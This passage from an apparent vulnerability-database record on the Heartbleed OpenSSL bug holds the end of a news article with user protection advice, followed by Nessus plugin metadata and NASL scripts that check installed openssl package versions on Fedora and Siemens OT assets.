said that it has \"_successfully made appropriate corrections_\" to the main Yahoo properties, including Yahoo Homepage, Search, Mail, Finance, Sports, Food, Tech, Flickr and Tumblr.\n\nYou can see the results of the Heartbleed mass-test performed around 8th April [here](<https://github.com/musalbas/heartbleed-masstest/blob/master/top1000.txt>). The websites shown as vulnerable in the list may not be vulnerable right now.\n\n \n**HOW TO CHECK IF YOUR FAVORITE WEBSITES ARE VULNERABLE**\n\n1.) First of all, check one by one whether the sites you use every day are vulnerable to the Heartbleed bug using [http://filippo.io/Heartbleed/](<https://filippo.io/Heartbleed/>), and if you're given a red flag, avoid the site for now. \n \n2.) LastPass also created a [Web app](<https://lastpass.com/heartbleed/>) that will tell you what kind of encryption a site uses, and when the encryption was last updated. \n \n3.) Provensec also created a scanner at <http://provensec.com/heartbleed/> \n \n4.) GlobalSign SSL Configuration [Checker](<https://sslcheck.globalsign.com/>). \n \n5.) The easiest way to keep yourself safe is to use a new add-on for the Chrome browser, [Chromebleed](<https://chrome.google.com/webstore/detail/chromebleed/eeoekjnjgppnaegdjbcafdggilajhpic>), created by security researcher Jamie Hoyle.\n\n**HOW TO PROTECT YOURSELF FROM HEARTBLEED** \nIf the site you use is not affected by the vulnerability, it's a good idea to change your password immediately, assuming that it was vulnerable before, just to make sure that you are now safe. But changing the password before the bug is fixed could compromise your new password as well. \n \nYou are advised not to reuse the same password on different websites and to use a separate password for each website. \n \nIf you are using public Wi-Fi at McDonald's or any other public place, then you should limit your Internet activity and avoid signing in to websites that are especially sensitive. 
\n \nOpenSSL versions 1.0.1 through 1.0.1f and 1.0.2-beta1 are vulnerable, and the flaw is fixed in [OpenSSL 1.0.1g](<https://www.openssl.org/source/>). If you haven't yet, please update any system that uses OpenSSL for TLS-encrypted communications.\n\nAnd last but not least, keep an eye on every financial transaction. It is also good practice to use two-factor authentication, which means that in addition to the password, the account requires a freshly generated passcode that shows up only on your personal smartphone before you can get into certain sites. \n \nStay Secure! Stay Tuned. \n \n**Related Important Articles:** \n \n\n\n * [German Developer responsible for HeartBleed Bug in OpenSSL](<https://thehackernews.com/2014/04/german-developer-responsible-for.html>)\n * [How Heartbleed Bug Exposes Your Passwords to Hackers](<https://thehackernews.com/2014/04/how-heartbleed-bug-exposes-your.html>)\n * [How to Protect yourself from the 'Heartbleed' Bug](<https://thehackernews.com/2014/04/how-heartbleed-bug-exposes-your.html>)\n * [Heartbleed - OpenSSL Zero-day Bug leaves Millions of websites Vulnerable](<https://thehackernews.com/2014/04/heartbleed-openssl-zero-day-bug-leaves.html>)\n", "cvss3": {}, "published": "2014-04-10T07:58:00", "type": "thn", "title": "How to Protect yourself from the 'Heartbleed' Bug", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2014-0160"], "modified": "2014-04-12T09:00:15", "id": "THN:3E9A13AAEA7FDC38D7BD8A148F19663D", "href": "https://thehackernews.com/2014/04/how-to-protect-yourself-from-heartbleed_10.html", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "nessus": [{"lastseen": "2022-05-21T15:03:29", "description": "pull in upstream patch for CVE-2014-0160", "cvss3": {"score": null, "vector": null}, "published": "2014-04-09T00:00:00", "type": "nessus", "title": "Fedora 20 : openssl-1.0.1e-37.fc20.1 (2014-4879)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-0160"], "modified": 
"2022-05-05T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:openssl", "cpe:/o:fedoraproject:fedora:20"], "id": "FEDORA_2014-4879.NASL", "href": "https://www.tenable.com/plugins/nessus/73429", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2014-4879.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(73429);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/05/05\");\n\n script_cve_id(\"CVE-2014-0160\");\n script_xref(name:\"FEDORA\", value:\"2014-4879\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/25\");\n\n script_name(english:\"Fedora 20 : openssl-1.0.1e-37.fc20.1 (2014-4879)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Fedora host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"pull in upstream patch for CVE-2014-0160\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1085065\");\n # https://lists.fedoraproject.org/pipermail/package-announce/2014-April/131221.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?78ae7e34\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected openssl package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:N\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'OpenSSL Heartbeat Information Leak');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n 
script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/04/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/04/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:openssl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:20\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Fedora Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC20\", reference:\"openssl-1.0.1e-37.fc20.1\")) flag++;\n\n\nif (flag)\n{\n report = rpm_report_get();\n\n if(!egrep(pattern:\"package installed.+openssl[^0-9]*\\-1\\.0\\.1\", string:report)) exit(0, \"The remote host does not use OpenSSL 1.0.1\");\n \n if (report_verbosity > 0) security_hole(port:0, extra:report);\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 9.4, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:N"}}, {"lastseen": "2022-06-15T16:53:40", "description": "The (1) TLS and (2) DTLS implementations in 
OpenSSL 1.0.1 before 1.0.1g do not properly handle Heartbeat Extension packets, which allows remote attackers to obtain sensitive information from process memory via crafted packets that trigger a buffer over-read, as demonstrated by reading private keys, related to d1_both.c and t1_lib.c, aka the Heartbleed bug. \n\nThis plugin only works with Tenable.ot. Please visit https://www.tenable.com/products/tenable-ot for more information.", "cvss3": {"score": 7.5, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"}, "published": "2022-02-07T00:00:00", "type": "nessus", "title": "Siemens (CVE-2014-0160)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-0160"], "modified": "2022-02-07T00:00:00", "cpe": ["cpe:/o:siemens:simatic_s7-1500_firmware:1.5", "cpe:/o:siemens:simatic_s7-1500t_firmware:1.5"], "id": "TENABLE_OT_SIEMENS_CVE-2014-0160.NASL", "href": "https://www.tenable.com/plugins/ot/500424", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(500424);\n script_version(\"1.1\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/02/07\");\n\n script_cve_id(\"CVE-2014-0160\");\n script_xref(name:\"RHSA\", value:\"RHSA-2014:0376\");\n script_xref(name:\"RHSA\", value:\"RHSA-2014:0396\");\n script_xref(name:\"SECUNIA\", value:\"57347\");\n script_xref(name:\"HP\", value:\"HPSBMU02995\");\n script_xref(name:\"DSA\", value:\"DSA-2896\");\n script_xref(name:\"RHSA\", value:\"RHSA-2014:0377\");\n script_xref(name:\"FEDORA\", value:\"FEDORA-2014-4879\");\n script_xref(name:\"RHSA\", value:\"RHSA-2014:0378\");\n script_xref(name:\"SECUNIA\", value:\"57483\");\n script_xref(name:\"FEDORA\", value:\"FEDORA-2014-4910\");\n script_xref(name:\"SuSE\", value:\"openSUSE-SU-2014:0492\");\n script_xref(name:\"SECUNIA\", value:\"57721\");\n script_xref(name:\"SuSE\", value:\"SUSE-SA:2014:002\");\n 
script_xref(name:\"CERT\", value:\"TA14-098A\");\n script_xref(name:\"SECUNIA\", value:\"57966\");\n script_xref(name:\"SECUNIA\", value:\"57968\");\n script_xref(name:\"EDB-ID\", value:\"32745\");\n script_xref(name:\"EDB-ID\", value:\"32764\");\n script_xref(name:\"SECUNIA\", value:\"57836\");\n script_xref(name:\"HP\", value:\"HPSBMU03009\");\n script_xref(name:\"HP\", value:\"HPSBMU03022\");\n script_xref(name:\"HP\", value:\"HPSBMU03024\");\n script_xref(name:\"HP\", value:\"HPSBST03000\");\n script_xref(name:\"HP\", value:\"HPSBHF03136\");\n script_xref(name:\"HP\", value:\"SSRT101846\");\n script_xref(name:\"HP\", value:\"HPSBMU03017\");\n script_xref(name:\"HP\", value:\"HPSBMU02994\");\n script_xref(name:\"HP\", value:\"HPSBST03001\");\n script_xref(name:\"HP\", value:\"HPSBST03004\");\n script_xref(name:\"HP\", value:\"HPSBST03016\");\n script_xref(name:\"HP\", value:\"HPSBMU03032\");\n script_xref(name:\"HP\", value:\"HPSBGN03011\");\n script_xref(name:\"HP\", value:\"HPSBMU03013\");\n script_xref(name:\"HP\", value:\"HPSBMU03023\");\n script_xref(name:\"HP\", value:\"HPSBMU03029\");\n script_xref(name:\"HP\", value:\"HPSBGN03008\");\n script_xref(name:\"HP\", value:\"HPSBPI03031\");\n script_xref(name:\"HP\", value:\"HPSBHF03021\");\n script_xref(name:\"HP\", value:\"HPSBMU03037\");\n script_xref(name:\"HP\", value:\"HPSBMU03012\");\n script_xref(name:\"HP\", value:\"HPSBMU03020\");\n script_xref(name:\"HP\", value:\"HPSBMU03025\");\n script_xref(name:\"HP\", value:\"HPSBST03027\");\n script_xref(name:\"HP\", value:\"HPSBMU02999\");\n script_xref(name:\"HP\", value:\"HPSBMU03040\");\n script_xref(name:\"HP\", value:\"HPSBST03015\");\n script_xref(name:\"HP\", value:\"HPSBMU02997\");\n script_xref(name:\"HP\", value:\"HPSBGN03010\");\n script_xref(name:\"HP\", value:\"HPSBMU03028\");\n script_xref(name:\"HP\", value:\"HPSBMU03044\");\n script_xref(name:\"HP\", value:\"HPSBMU03033\");\n script_xref(name:\"HP\", value:\"HPSBPI03014\");\n 
script_xref(name:\"HP\", value:\"HPSBMU02998\");\n script_xref(name:\"HP\", value:\"HPSBMU03019\");\n script_xref(name:\"HP\", value:\"HPSBMU03030\");\n script_xref(name:\"HP\", value:\"HPSBMU03018\");\n script_xref(name:\"HP\", value:\"HPSBMU03062\");\n script_xref(name:\"SECUNIA\", value:\"59347\");\n script_xref(name:\"SECUNIA\", value:\"59243\");\n script_xref(name:\"SECUNIA\", value:\"59139\");\n script_xref(name:\"FEDORA\", value:\"FEDORA-2014-9308\");\n script_xref(name:\"USN\", value:\"USN-2165-1\");\n script_xref(name:\"SuSE\", value:\"openSUSE-SU-2014:0560\");\n\n script_name(english:\"Siemens (CVE-2014-0160)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote OT asset is affected by a vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The (1) TLS and (2) DTLS implementations in OpenSSL 1.0.1 before 1.0.1g do not properly handle Heartbeat Extension\npackets, which allows remote attackers to obtain sensitive information from process memory via crafted packets that\ntrigger a buffer over-read, as demonstrated by reading private keys, related to d1_both.c and t1_lib.c, aka the\nHeartbleed bug. \n\nThis plugin only works with Tenable.ot. 
Please visit https://www.tenable.com/products/tenable-ot for\nmore information.\");\n # http://git.openssl.org/gitweb/?p=openssl.git;a=commit;h=96db9023b881d7cd9f379b0c154650d6c108e9a3\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?8f4e30e1\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1084875\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.openssl.org/news/secadv_20140407.txt\");\n script_set_attribute(attribute:\"see_also\", value:\"http://heartbleed.com/\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.securitytracker.com/id/1030078\");\n script_set_attribute(attribute:\"see_also\", value:\"http://seclists.org/fulldisclosure/2014/Apr/109\");\n script_set_attribute(attribute:\"see_also\", value:\"http://seclists.org/fulldisclosure/2014/Apr/190\");\n # https://lists.balabit.hu/pipermail/syslog-ng-announce/2014-April/000184.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?bb05d3e3\");\n # http://www.oracle.com/technetwork/topics/security/opensslheartbleedcve-2014-0160-2188454.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?3053dc8b\");\n script_set_attribute(attribute:\"see_also\", value:\"http://rhn.redhat.com/errata/RHSA-2014-0376.html\");\n script_set_attribute(attribute:\"see_also\", value:\"http://rhn.redhat.com/errata/RHSA-2014-0396.html\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.securitytracker.com/id/1030082\");\n script_set_attribute(attribute:\"see_also\", value:\"http://secunia.com/advisories/57347\");\n script_set_attribute(attribute:\"see_also\", value:\"http://marc.info/?l=bugtraq&m=139722163017074&w=2\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.securitytracker.com/id/1030077\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www-01.ibm.com/support/docview.wss?uid=swg21670161\");\n 
script_set_attribute(attribute:\"see_also\", value:\"http://www.debian.org/security/2014/dsa-2896\");\n script_set_attribute(attribute:\"see_also\", value:\"http://rhn.redhat.com/errata/RHSA-2014-0377.html\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.securitytracker.com/id/1030080\");\n # http://lists.fedoraproject.org/pipermail/package-announce/2014-April/131221.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?93cd0f79\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.securitytracker.com/id/1030074\");\n script_set_attribute(attribute:\"see_also\", value:\"http://seclists.org/fulldisclosure/2014/Apr/90\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.securitytracker.com/id/1030081\");\n # http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20140409-heartbleed\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?4f211d28\");\n script_set_attribute(attribute:\"see_also\", value:\"http://rhn.redhat.com/errata/RHSA-2014-0378.html\");\n script_set_attribute(attribute:\"see_also\", value:\"http://seclists.org/fulldisclosure/2014/Apr/91\");\n script_set_attribute(attribute:\"see_also\", value:\"http://secunia.com/advisories/57483\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.splunk.com/view/SP-CAAAMB3\");\n # http://lists.fedoraproject.org/pipermail/package-announce/2014-April/131291.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?d79cd294\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.securitytracker.com/id/1030079\");\n # http://lists.opensuse.org/opensuse-security-announce/2014-04/msg00004.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?8e93b1c3\");\n script_set_attribute(attribute:\"see_also\", value:\"http://secunia.com/advisories/57721\");\n script_set_attribute(attribute:\"see_also\", 
value:\"http://www.blackberry.com/btsc/KB35882\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.securitytracker.com/id/1030026\");\n # http://lists.opensuse.org/opensuse-security-announce/2014-04/msg00005.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?22274a45\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.securityfocus.com/bid/66690\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.getchef.com/blog/2014/04/09/chef-server-11-0-12-release/\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.us-cert.gov/ncas/alerts/TA14-098A\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.getchef.com/blog/2014/04/09/enterprise-chef-1-4-9-release/\");\n script_set_attribute(attribute:\"see_also\", value:\"http://blog.fox-it.com/2014/04/08/openssl-heartbleed-bug-live-blog/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://blog.torproject.org/blog/openssl-bug-cve-2014-0160\");\n script_set_attribute(attribute:\"see_also\", value:\"http://secunia.com/advisories/57966\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.f-secure.com/en/web/labs_global/fsc-2014-1\");\n script_set_attribute(attribute:\"see_also\", value:\"http://seclists.org/fulldisclosure/2014/Apr/173\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.getchef.com/blog/2014/04/09/enterprise-chef-11-1-3-release/\");\n script_set_attribute(attribute:\"see_also\", value:\"http://secunia.com/advisories/57968\");\n script_set_attribute(attribute:\"see_also\", value:\"https://code.google.com/p/mod-spdy/issues/detail?id=85\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.exploit-db.com/exploits/32745\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.kb.cert.org/vuls/id/720951\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.cert.fi/en/reports/2014/vulnerability788210.html\");\n 
script_set_attribute(attribute:\"see_also\", value:\"http://www.exploit-db.com/exploits/32764\");\n script_set_attribute(attribute:\"see_also\", value:\"http://secunia.com/advisories/57836\");\n script_set_attribute(attribute:\"see_also\", value:\"https://gist.github.com/chapmajs/10473815\");\n # http://www.getchef.com/blog/2014/04/09/chef-server-heartbleed-cve-2014-0160-releases/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?8376305c\");\n script_set_attribute(attribute:\"see_also\", value:\"http://cogentdatahub.com/ReleaseNotes.html\");\n script_set_attribute(attribute:\"see_also\", value:\"http://marc.info/?l=bugtraq&m=139905458328378&w=2\");\n script_set_attribute(attribute:\"see_also\", value:\"http://marc.info/?l=bugtraq&m=139869891830365&w=2\");\n script_set_attribute(attribute:\"see_also\", value:\"http://marc.info/?l=bugtraq&m=139889113431619&w=2\");\n # http://public.support.unisys.com/common/public/vulnerability/NVD_Detail_Rpt.aspx?ID=1\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?ddfe97e6\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.kerio.com/support/kerio-control/release-history\");\n # http://public.support.unisys.com/common/public/vulnerability/NVD_Detail_Rpt.aspx?ID=3\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?dcfb51d7\");\n script_set_attribute(attribute:\"see_also\", value:\"http://advisories.mageia.org/MGASA-2014-0165.html\");\n # https://h20566.www2.hp.com/portal/site/hpsc/template.PAGE/public/kb/docDisplay/?spf_p.tpst=kbDocDisplay&spf_p.prp_kbDocDisplay=wsrp-navigationalState%3DdocId%253Demr_na-c04260637-4%257CdocLocale%253Den_US%257CcalledBy%253DSearch_Result&javax.portlet.begCacheTok=com.vignette.cachetoken&javax.portlet.endCacheTok=com.vignette.cachetoken\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?337f7a06\");\n # 
http://www.oracle.com/technetwork/topics/security/cpujul2014-1972956.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?7de2f8eb\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www-01.ibm.com/support/docview.wss?uid=isg400001843\");\n script_set_attribute(attribute:\"see_also\", value:\"https://filezilla-project.org/versions.php?type=server\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www-01.ibm.com/support/docview.wss?uid=isg400001841\");\n # https://support.f5.com/kb/en-us/solutions/public/15000/100/sol15159.html?sr=36517217\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?dcdcb279\");\n script_set_attribute(attribute:\"see_also\", value:\"http://marc.info/?l=bugtraq&m=141287864628122&w=2\");\n script_set_attribute(attribute:\"see_also\", value:\"http://seclists.org/fulldisclosure/2014/Dec/23\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.vmware.com/security/advisories/VMSA-2014-0012.html\");\n script_set_attribute(attribute:\"see_also\", value:\"http://marc.info/?l=bugtraq&m=142660345230545&w=2\");\n # http://www.websense.com/support/article/kbarticle/Vulnerabilities-resolved-in-TRITON-APX-Version-8-0\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?c46d757d\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.mandriva.com/security/advisories?name=MDVSA-2015:062\");\n script_set_attribute(attribute:\"see_also\", value:\"http://marc.info/?l=bugtraq&m=139817727317190&w=2\");\n script_set_attribute(attribute:\"see_also\", value:\"http://marc.info/?l=bugtraq&m=139757726426985&w=2\");\n script_set_attribute(attribute:\"see_also\", value:\"http://marc.info/?l=bugtraq&m=139758572430452&w=2\");\n script_set_attribute(attribute:\"see_also\", value:\"http://marc.info/?l=bugtraq&m=139905653828999&w=2\");\n script_set_attribute(attribute:\"see_also\", 
value:\"http://marc.info/?l=bugtraq&m=139842151128341&w=2\");\n script_set_attribute(attribute:\"see_also\", value:\"http://marc.info/?l=bugtraq&m=139905405728262&w=2\");\n script_set_attribute(attribute:\"see_also\", value:\"http://marc.info/?l=bugtraq&m=139833395230364&w=2\");\n script_set_attribute(attribute:\"see_also\", value:\"http://marc.info/?l=bugtraq&m=139824993005633&w=2\");\n script_set_attribute(attribute:\"see_also\", value:\"http://marc.info/?l=bugtraq&m=139843768401936&w=2\");\n script_set_attribute(attribute:\"see_also\", value:\"http://marc.info/?l=bugtraq&m=139905202427693&w=2\");\n script_set_attribute(attribute:\"see_also\", value:\"http://marc.info/?l=bugtraq&m=139774054614965&w=2\");\n script_set_attribute(attribute:\"see_also\", value:\"http://marc.info/?l=bugtraq&m=139889295732144&w=2\");\n script_set_attribute(attribute:\"see_also\", value:\"http://marc.info/?l=bugtraq&m=139835815211508&w=2\");\n script_set_attribute(attribute:\"see_also\", value:\"http://marc.info/?l=bugtraq&m=140724451518351&w=2\");\n script_set_attribute(attribute:\"see_also\", value:\"http://marc.info/?l=bugtraq&m=139808058921905&w=2\");\n script_set_attribute(attribute:\"see_also\", value:\"http://marc.info/?l=bugtraq&m=139836085512508&w=2\");\n script_set_attribute(attribute:\"see_also\", value:\"http://marc.info/?l=bugtraq&m=139869720529462&w=2\");\n script_set_attribute(attribute:\"see_also\", value:\"http://marc.info/?l=bugtraq&m=139905868529690&w=2\");\n script_set_attribute(attribute:\"see_also\", value:\"http://marc.info/?l=bugtraq&m=139765756720506&w=2\");\n script_set_attribute(attribute:\"see_also\", value:\"http://marc.info/?l=bugtraq&m=140015787404650&w=2\");\n script_set_attribute(attribute:\"see_also\", value:\"http://marc.info/?l=bugtraq&m=139824923705461&w=2\");\n script_set_attribute(attribute:\"see_also\", value:\"http://marc.info/?l=bugtraq&m=139757919027752&w=2\");\n script_set_attribute(attribute:\"see_also\", 
value:\"http://marc.info/?l=bugtraq&m=139774703817488&w=2\");\n script_set_attribute(attribute:\"see_also\", value:\"http://marc.info/?l=bugtraq&m=139905243827825&w=2\");\n script_set_attribute(attribute:\"see_also\", value:\"http://marc.info/?l=bugtraq&m=140075368411126&w=2\");\n script_set_attribute(attribute:\"see_also\", value:\"http://marc.info/?l=bugtraq&m=139905295427946&w=2\");\n script_set_attribute(attribute:\"see_also\", value:\"http://marc.info/?l=bugtraq&m=139835844111589&w=2\");\n script_set_attribute(attribute:\"see_also\", value:\"http://marc.info/?l=bugtraq&m=139757819327350&w=2\");\n script_set_attribute(attribute:\"see_also\", value:\"http://marc.info/?l=bugtraq&m=139817685517037&w=2\");\n script_set_attribute(attribute:\"see_also\", value:\"http://marc.info/?l=bugtraq&m=139905351928096&w=2\");\n script_set_attribute(attribute:\"see_also\", value:\"http://marc.info/?l=bugtraq&m=139817782017443&w=2\");\n script_set_attribute(attribute:\"see_also\", value:\"http://marc.info/?l=bugtraq&m=140752315422991&w=2\");\n # http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=&suid=20160512_00\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?bd05ca98\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www-01.ibm.com/support/docview.wss?uid=ssg1S1004661\");\n # http://www.innominate.com/data/downloads/manuals/mdm_1.5.2.1_Release_Notes.pdf\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?bc543587\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.apcmedia.com/salestools/SJHN-7RKGNM/SJHN-7RKGNM_R4_EN.pdf\");\n script_set_attribute(attribute:\"see_also\", value:\"http://secunia.com/advisories/59347\");\n script_set_attribute(attribute:\"see_also\", value:\"http://secunia.com/advisories/59243\");\n script_set_attribute(attribute:\"see_also\", value:\"http://secunia.com/advisories/59139\");\n # 
http://lists.fedoraproject.org/pipermail/package-announce/2014-August/136473.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?f68d352b\");\n # http://download.schneider-electric.com/files?p_Doc_Ref=SEVD%202014-119-01\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?31a74a0b\");\n # https://support.f5.com/kb/en-us/solutions/public/15000/100/sol15159.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?b7354398\");\n script_set_attribute(attribute:\"see_also\", value:\"http://support.citrix.com/article/CTX140605\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.ubuntu.com/usn/USN-2165-1\");\n script_set_attribute(attribute:\"see_also\", value:\"http://lists.opensuse.org/opensuse-updates/2014-04/msg00061.html\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.securityfocus.com/archive/1/534161/100/0/threaded\");\n # https://www.mitel.com/en-ca/support/security-advisories/mitel-product-security-advisory-17-0008\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?b3e9d2b8\");\n # https://lists.apache.org/thread.html/ba661b0edd913b39ff129a32d855620dd861883ade05fd88a8ce517d@%3Cdev.tomcat.apache.org%3E\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?a6abc3fa\");\n # https://lists.apache.org/thread.html/f8e0814e11c7f21f42224b6de111cb3f5e5ab5c15b78924c516d4ec2@%3Cdev.tomcat.apache.org%3E\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?e09c159e\");\n # https://sku11army.blogspot.com/2020/01/heartbleed-hearts-continue-to-bleed.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?3aa4af59\");\n # https://lists.apache.org/thread.html/rf8e8c091182b45daa50d3557cad9b10bb4198e3f08cf8f1c66a1b08d@%3Cdev.tomcat.apache.org%3E\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?37006736\");\n 
script_set_attribute(attribute:\"see_also\", value:\"https://cert-portal.siemens.com/productcert/pdf/ssa-635659.pdf\");\n # https://lists.apache.org/thread.html/re3b72cbb13e1dfe85c4a06959a3b6ca6d939b407ecca80db12b54220@%3Cdev.tomcat.apache.org%3E\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?1c45738a\");\n script_set_attribute(attribute:\"solution\", value:\n\"Refer to the vendor advisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-0160\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_cwe_id(119);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/04/07\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/04/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/02/07\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:siemens:simatic_s7-1500_firmware:1.5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:siemens:simatic_s7-1500t_firmware:1.5\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Tenable.ot\");\n\n script_copyright(english:\"This script is Copyright (C) 2022 and is owned by Tenable, Inc. 
